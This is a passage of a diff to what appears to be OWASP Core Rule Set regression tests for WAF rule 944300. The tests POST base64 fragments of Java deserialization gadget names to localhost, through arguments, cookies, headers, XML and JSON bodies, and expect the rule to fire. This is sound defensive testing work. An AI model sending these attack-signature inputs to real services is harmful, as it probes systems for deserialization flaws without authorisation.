test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-211 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 211 desc: "Argument name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-212 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test" + output: + log: + expect_ids: [944300] + - test_id: 212 desc: "Cookie test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gludm9rZXJ0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-213 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 213 desc: "Cookie name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gludm9rZXJ0cmFuc2Zvcm1lcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-214 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gludm9rZXJ0cmFuc2Zvcm1lcg=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 214 desc: "Request header test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Gludm9rZXJ0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-215 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 215 desc: "XML attribute value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-216 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 216 desc: "XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-217 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 217 desc: "Nested XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-218 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 218 desc: "Content-Type text/plain includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-219 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 219 desc: "Content-Type application/json arg value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-220 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" + output: + log: + expect_ids: [944300] + - test_id: 220 desc: "Content-Type application/json arg name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-221 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 221 desc: 
"Argument test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-222 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 222 desc: "Argument name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnZva2VydHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-223 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI=test" + output: + log: + expect_ids: [944300] + - test_id: 223 desc: "Cookie test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BpbnZva2VydHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-224 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 224 desc: "Cookie name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnZva2VydHJhbnNmb3JtZXI=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-225 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnZva2VydHJhbnNmb3JtZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 225 desc: "Request header test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnZva2VydHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-226 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 226 desc: "XML attribute value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-227 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 227 desc: "XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-228 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 228 desc: "Nested XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-229 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 229 desc: "Content-Type text/plain includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-230 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 230 desc: "Content-Type application/json arg value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-231 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" + output: + log: + expect_ids: [944300] + - test_id: 231 desc: "Content-Type application/json arg name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-232 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 232 desc: 
"Argument test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-233 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 233 desc: "Argument name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-234 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" + output: + log: + expect_ids: [944300] + - test_id: 234 desc: "Cookie test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cHJvdG90eXBlY2xvbmVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-235 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 235 desc: "Cookie name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvdG90eXBlY2xvbmVmYWN0b3J5=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-236 + - input: + dest_addr: "127.0.0.1" + port: 80 + 
